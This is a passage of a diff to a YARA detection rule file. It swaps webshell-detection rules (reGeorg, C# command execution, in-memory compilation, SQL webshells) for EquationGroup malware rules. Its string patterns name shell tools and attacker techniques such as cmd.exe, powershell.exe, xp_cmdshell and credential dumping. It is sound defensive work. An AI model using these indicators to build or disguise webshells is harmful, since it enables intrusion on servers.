-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $asp_reg* ) and any of ( $sus* ) and not any of ( $fp* ) and ( filesize < 10KB or ( filesize < 150KB and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Regeorg_CSHARP : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll_X64 : FILE
 {
 	meta:
-		description = "Webshell regeorg aspx c# version"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0a53d368-5f1b-55b7-b08f-36b0f8c5612f"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "https://github.com/sensepost/reGeorg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4856-L4966"
+		description = "EquationGroup Malware - file PC_Level3_http_flav_dll_x64"
+		author = "Florian Roth (Nextron Systems)"
+		id = "93a3d47d-1dac-5621-8e69-d6d23b7628db"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1754-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
-		hash = "479c1e1f1c263abe339de8be99806c733da4e8c1"
-		hash = "38a1f1fc4e30c0b4ad6e7f0e1df5a92a7d05020b"
-		hash = "e54f1a3eab740201feda235835fc0aa2e0c44ba9"
-		hash = "aea0999c6e5952ec04bf9ee717469250cddf8a6f"
-		logic_hash = "0c68f5955df2e75c3b5b4f1c6398fd57add1f64bfb3d46ccebf1c6767f5d2eb1"
+		logic_hash = "b304cb747e609ad5de46624e2d0d005d5f8521e16f0b36cab31535709d7ab72f"
 		score = 75
-		quality = -7
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "4e0209b4f5990148f5d6dee47dbc7021bf78a782b85cef4d6c8be22d698b884f"
 
 	strings:
-		$input_sa1 = "Request.QueryString.Get" fullword nocase wide ascii
-		$input_sa2 = "Request.Headers.Get" fullword nocase wide ascii
-		$sa1 = "AddressFamily.InterNetwork" fullword nocase wide ascii
-		$sa2 = "Response.AddHeader" fullword nocase wide ascii
-		$sa3 = "Request.InputStream.Read" nocase wide ascii
-		$sa4 = "Response.BinaryWrite" nocase wide ascii
-		$sa5 = "Socket" nocase wide ascii
-		$georg = "Response.Write(\"Georg says, 'All seems fine'\")"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = ".?AVOpenSocket@@" fullword ascii
+		$s4 = "RHTTP/1.0" fullword wide
+		$s5 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		filesize < 300KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( $georg or ( all of ( $sa* ) and any of ( $input_sa* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_CSHARP_Generic : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_3 : FILE
 {
 	meta:
-		description = "Webshell in c#"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6d38a6b0-b1d2-51b0-9239-319f1fea7cae"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4968-L5076"
+		description = "EquationGroup Malware - file mssld.dll"
+		author = "Auto Generated"
+		id = "f664ad78-1820-5434-94cc-94f98b32e654"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1773-L1787"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6721683aadc4b4eba4f081f2bc6bc57adfc0e378f6d80e2bfa0b1e3e57c85c7"
-		hash = "4b365fc9ddc8b247a12f4648cd5c91ee65e33fae"
-		hash = "019eb61a6b5046502808fb5ab2925be65c0539b4"
-		hash = "620ee444517df8e28f95e4046cd7509ac86cd514"
-		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
-		logic_hash = "fb367b79c8ed4a61618594db903cf3d70524685d7710d243163958ecb47634aa"
+		logic_hash = "6b43280a94f1f5c62185f6b879126bcd258e9875beeb0f7ec1e3569494a60669"
 		score = 75
-		quality = -5
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "69dcc150468f7707cc8ef618a4cea4643a817171babfba9290395ada9611c63c"
 
 	strings:
-		$input_http = "Request." nocase wide ascii
-		$input_form1 = "<asp:" nocase wide ascii
-		$input_form2 = ".text" nocase wide ascii
-		$exec_proc1 = "new Process" nocase wide ascii
-		$exec_proc2 = "start(" nocase wide ascii
-		$exec_shell1 = "cmd.exe" nocase wide ascii
-		$exec_shell2 = "powershell.exe" nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and filesize < 300KB and ( $input_http or all of ( $input_form* ) ) and all of ( $exec_proc* ) and any of ( $exec_shell* )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Runtime_Compile : FILE
+rule SIGNATURE_BASE_Equationgroup_Getadmin_Lp : FILE
 {
 	meta:
-		description = "ASP webshell compiling payload in memory at runtime, e.g. sharpyshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5da9318d-f542-5603-a111-5b240f566d47"
-		date = "2021-01-11"
-		modified = "2023-04-05"
-		reference = "https://github.com/antonioCoco/SharPyShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5078-L5176"
+		description = "EquationGroup Malware - file GetAdmin_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3bbe0553-a5a3-5207-a94e-ad978606d9a4"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1789-L1802"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e826c4139282818d38dcccd35c7ae6857b1d1d01"
-		hash = "e20e078d9fcbb209e3733a06ad21847c5c5f0e52"
-		hash = "57f758137aa3a125e4af809789f3681d1b08ee5b"
-		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
-		hash = "e44058dd1f08405e59d411d37d2ebc3253e2140385fa2023f9457474031b48ee"
-		hash = "f6092ab5c8d491ae43c9e1838c5fd79480055033b081945d16ff0f1aaf25e6c7"
-		hash = "dfd30139e66cba45b2ad679c357a1e2f565e6b3140a17e36e29a1e5839e87c5e"
-		hash = "89eac7423dbf86eb0b443d8dd14252b4208e7462ac2971c99f257876388fccf2"
-		hash = "8ce4eaf111c66c2e6c08a271d849204832713f8b66aceb5dadc293b818ccca9e"
-		logic_hash = "6699a44e396eedebb3bafa0e89c3b6d080586a158ed056ec7220bdf2ad764444"
+		logic_hash = "5bff3858c59b1bb44c5e24ca5f77d8e1e582224cc1caad3955d1adb0efea318a"
 		score = 75
-		quality = 19
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
 
 	strings:
-		$payload_reflection1 = "System" fullword nocase wide ascii
-		$payload_reflection2 = "Reflection" fullword nocase wide ascii
-		$payload_reflection3 = "Assembly" fullword nocase wide ascii
-		$payload_load_reflection1 = /[."']Load\b/ nocase wide ascii
-		$payload_load_reflection2 = /\bGetMethod\(("load|\w)/ nocase wide ascii
-		$payload_compile1 = "GenerateInMemory" nocase wide ascii
-		$payload_compile2 = "CompileAssemblyFromSource" nocase wide ascii
-		$payload_invoke1 = "Invoke" fullword nocase wide ascii
-		$payload_invoke2 = "CreateInstance" fullword nocase wide ascii
-		$payload_xamlreader1 = "XamlReader" fullword nocase wide ascii
-		$payload_xamlreader2 = "Parse" fullword nocase wide ascii
-		$payload_xamlreader3 = "assembly=" nocase wide ascii
-		$payload_powershell1 = "PSObject" fullword nocase wide ascii
-		$payload_powershell2 = "Invoke" fullword nocase wide ascii
-		$payload_powershell3 = "CreateRunspace" fullword nocase wide ascii
-		$rc_fp1 = "Request.MapPath"
-		$rc_fp2 = "<body><mono:MonoSamplesHeader runat=\"server\"/>" wide ascii
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_input4 = "\\u0065\\u0071\\u0075" wide ascii
-		$asp_input5 = "\\u0065\\u0073\\u0074" wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$sus_refl1 = " ^= " wide ascii
-		$sus_refl2 = "SharPy" wide ascii
+		$x1 = "Current user is System -- unable to join administrators group" fullword wide
 
 	condition:
-		(( filesize < 50KB and any of ( $sus_refl* ) ) or filesize < 10KB ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not any of ( $rc_fp* ) and ( ( all of ( $payload_reflection* ) and any of ( $payload_load_reflection* ) ) or ( all of ( $payload_compile* ) and any of ( $payload_invoke* ) ) or all of ( $payload_xamlreader* ) or all of ( $payload_powershell* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_SQL : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifygroup_Lp : FILE
 {
 	meta:
-		description = "ASP webshell giving SQL access. Might also be a dual use tool."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e534dcb9-40ab-544f-ae55-89fb21c422e9"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5178-L5359"
+		description = "EquationGroup Malware - file ModifyGroup_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "82c9617a-3d78-525f-a507-76c87aad7c59"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1805-L1819"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "216c1dd950e0718e35bc4834c5abdc2229de3612"
-		hash = "ffe44e9985d381261a6e80f55770833e4b78424bn"
-		hash = "3d7cd32d53abc7f39faed133e0a8f95a09932b64"
-		hash = "f19cc178f1cfad8601f5eea2352cdbd2d6f94e7e"
-		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
-		logic_hash = "c59250065c4be267746f716f922007b638706a76579af6509c8e97d0cee03f33"
+		logic_hash = "8fe5102cacd9149a0ed60440c563953d487aa2b28a3b947d821d0cc3f3396a4a"
 		score = 75
-		quality = -34
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
 
 	strings:
-		$sql1 = "SqlConnection" fullword wide ascii
-		$sql2 = "SQLConnection" fullword wide ascii
-		$sql3 = "System" fullword wide ascii
-		$sql4 = "Data" fullword wide ascii
-		$sql5 = "SqlClient" fullword wide ascii
-		$sql6 = "SQLClient" fullword wide ascii
-		$sql7 = "Open" fullword wide ascii
-		$sql8 = "SqlCommand" fullword wide ascii
-		$sql9 = "SQLCommand" fullword wide ascii
-		$o_sql1 = "SQLOLEDB" fullword wide ascii
-		$o_sql2 = "CreateObject" fullword wide ascii
-		$o_sql3 = "open" fullword wide ascii
-		$a_sql1 = "ADODB.Connection" fullword wide ascii
-		$a_sql2 = "adodb.connection" fullword wide ascii
-		$a_sql3 = "CreateObject" fullword wide ascii
-		$a_sql4 = "createobject" fullword wide ascii
-		$a_sql5 = "open" fullword wide ascii
-		$c_sql1 = "System.Data.SqlClient" fullword wide ascii
-		$c_sql2 = "sqlConnection" fullword wide ascii
-		$c_sql3 = "open" fullword wide ascii
-		$sus1 = "shell" fullword nocase wide ascii
-		$sus2 = "xp_cmdshell" fullword nocase wide ascii
-		$sus3 = "aspxspy" fullword nocase wide ascii
-		$sus4 = "_KillMe" wide ascii
-		$sus5 = "cmd.exe" fullword wide ascii
-		$sus6 = "cmd /c" fullword wide ascii
-		$sus7 = "net user" fullword wide ascii
-		$sus8 = "\\x2D\\x3E\\x7C" wide ascii
-		$sus9 = "Hacker" fullword wide ascii
-		$sus10 = "hacker" fullword wide ascii
-		$sus11 = "HACKER" fullword wide ascii
-		$sus12 = "webshell" wide ascii
-		$sus13 = "equest[\"sql\"]" wide ascii
-		$sus14 = "equest(\"sql\")" wide ascii
-		$sus15 = { e5 bc 80 e5 a7 8b e5 af bc e5 }
-		$sus16 = "\"sqlCommand\"" wide ascii
-		$sus17 = "\"sqlcommand\"" wide ascii
-		$slightly_sus3 = "SHOW COLUMNS FROM " wide ascii
-		$slightly_sus4 = "show columns from " wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s1 = "Modify Privileges failed" fullword wide
+		$s2 = "Given privilege name not found" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( 6 of ( $sql* ) or all of ( $o_sql* ) or 3 of ( $a_sql* ) or all of ( $c_sql* ) ) and ( ( filesize < 150KB and any of ( $sus* ) ) or ( filesize < 5KB and any of ( $slightly_sus* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Scan_Writable : FILE
+rule SIGNATURE_BASE_Equationgroup_Pwdump_Lp : FILE
 {
 	meta:
-		description = "ASP webshell searching for writable directories (to hide more webshells ...)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1766e081-0591-59ab-b546-b13207764b4d"
-		date = "2021-03-14"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5361-L5504"
+		description = "EquationGroup Malware - file pwdump_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6f356f13-9ec1-5dd9-91b2-6a3071398e81"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1821-L1834"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2409eda9047085baf12e0f1b9d0b357672f7a152"
-		hash = "af1c00696243f8b062a53dad9fb8b773fa1f0395631ffe6c7decc42c47eedee7"
-		logic_hash = "80969fd0c27903dabf08a250a47971725ac5762fd2f9afd96167b8f88f277348"
+		logic_hash = "7381ffd9b2b720fa99d52bc5805fea942e5a966bf3fd611f1a80a875edd06dad"
 		score = 75
-		quality = -64
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
 
 	strings:
-		$scan1 = "DirectoryInfo" nocase fullword wide ascii
-		$scan2 = "GetDirectories" nocase fullword wide ascii
-		$scan3 = "Create" nocase fullword wide ascii
-		$scan4 = "File" nocase fullword wide ascii
-		$scan5 = "System.IO" nocase fullword wide ascii
-		$scan6 = "CanWrite" nocase fullword wide ascii
-		$scan7 = "Delete" nocase fullword wide ascii
-		$sus1 = "upload" nocase fullword wide ascii
-		$sus2 = "shell" nocase wide ascii
-		$sus3 = "orking directory" nocase fullword wide ascii
-		$sus4 = "scan" nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$x1 = "PWDUMP - - ERROR - -" wide
 
 	condition:
-		filesize < 10KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and 6 of ( $scan* ) and any of ( $sus* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Regeorg : FILE
+rule SIGNATURE_BASE_Equationgroup_Eventlogedit_Implant : FILE
 {
 	meta:
-		description = "Webshell regeorg JSP version"
